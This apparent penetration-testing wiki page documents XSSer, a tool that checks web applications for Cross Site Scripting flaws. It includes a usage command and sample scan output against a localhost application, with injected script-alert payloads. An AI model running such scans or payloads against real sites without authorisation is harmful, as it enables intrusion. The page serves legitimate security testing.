Menu

XSSer-en




XSSer

Phase(s):

Primary: Exploitation.
Secondary: N/A.

Description:

Tool that helps verifying Cross Site Scripting vulnerabilities.

Objective:

  • Verify Cross Site Scripting vulnerabilities on a web application.
  • Obtain the payload required to exploit the Cross Site Scripting vulnerability.

Features:

Supported technologies: Web applications (HTTP/HTTPS).

Operative mode: Active.

Verify Cross Site Scripting vulnerabilities on a web application.

  • Sends several petitions with predefined payloads in order to verify the exploitability of the detected vulnerabilities.

Report in TXT and XML format.

  • Verify the exploitability of Cross Site Scripting vulnerabilities present on a web application. The following command sends a petition to the web application with a crafted payload in order to verify the exploitability of the Cross Site Scripting vulnerability.

Reports:
Output reports:

  • Reports in TXT and XML format.

    Basic usage:

    Verify the exploitability of Cross Site Scripting vulnerabilities present on a web application. The following command sends a petition to the web application with a crafted payload in order to verify the exploitability of the Cross Site Scripting vulnerability.

    ./xsser -u [URL] -g ?txt002=asd&txt003=" --auto --save --xml=[Directorio]/reporteXmlXSSer.xml


    Where:

    • -u. URL where the Cross Site Scripting was identified.
    • -g. Required parameters being the vulnerable parameter the last one to be included with the “=” operator.
    • --auto. Include predefined payloads.
    • --save. Export the results on a file, by defect “XSSlist.dat”
    • --xml. Export the test report in a XML file.

    The tool will begin the scan by connectivity to the application.

    ===========================================================================

    XSSer v1.6 (beta): "Grey Swarm!" - 2011/2012 - (GPLv3.0) -> by psy

    ===========================================================================
    Testing [XSS from URL] injections... looks like your target is good defined ;)
    ===========================================================================

    HEAD alive check for the target:
    (http://localhost/miaplicacion/viewTxtSecond.php) is OK(200) [AIMED]

    ===========================================================================
    Target: http://localhost/miaplicacion/viewTxtSecond.php --> 2013-10-24 15:28:52.029448
    ===========================================================================


    Next, the tool will display the execution status of the tests currently running.


    ---------------------------------------------
    [-] Hashing: 17b639ff5ed74979be28767fac3a3ccc
    [+] Trying: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003=">17b639ff5ed74979be28767fac3a3ccc
    [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
    [+] Checking: url attack with ">PAYLOAD... ok

    ===========================================================================
    Target: http://localhost/miaplicacion/viewTxtSecond.php --> 2013-10-24 15:28:52.029448
    ===========================================================================

    ---------------------------------------------
    [-] Hashing: 23f90e9384b1b1d14fac2219f4852b5a
    [+] Trying: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003=">
    [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
    [+] Checking: url attack with ">... fail

    ===========================================================================
    Target: http://localhost/miaplicacion/viewTxtSecond.php --> 2013-10-24 15:28:52.029448


    Upon competition, a summary report will be displayed which included the number of tests performed and verified vulnerabilities statistics.

    ===========================================================================

    Mosquito(s) landed!

    ===========================================================================
    [*] Final Results:
    ===========================================================================

    - Injections: 98
    - Failed: 83
    - Sucessfull: 15
    - Accur: 15 %

    ===========================================================================
    [*] List of possible XSS injections:
    ===========================================================================

    [I] Target: http://localhost/miaplicacion/viewTxtSecond.php
    [+] Injection: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003="><script>alert('54cb1f93151d601c24d761ecdf9b5 692')</script>
    [-] Method: xss
    [-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
    --------------------------------------------------

    [I] Target: http://localhost/miaplicacion/viewTxtSecond.php
    [+] Injection: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003='';!--"<63fc790dd14eec89b6eec7dca56230b1>=&{()}"
    [-] Method: xss
    [-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
    --------------------------------------------------


    XML report example:

    <report>
    <header>
    <title>XSSer Security Report: AAA-MM-DD hh:mm:ss.xxxx</title>
    </header>
    <abstract>
    <injections>
    <total>TOTAL</total>
    <failed>FAILED</failed>
    <successful>SUCCESSSFUL</successful>
    <accur>%</accur>
    </injections>
    </abstract>
    <results>
    <attack>
    <injection>URL_WITH_INJECTION</injection>
    <browsers>BROWSER_SUPPORT</browsers>
    <method>METHOD</method>
    </attack>

    </results>
    </report>


    Resources:

    Link: http://xsser.sourceforge.net/
    Author(s): psy (epsylon)
    Contact: root [at] lordepsylon.net
    License: GNU GENERAL PUBLIC LICENSE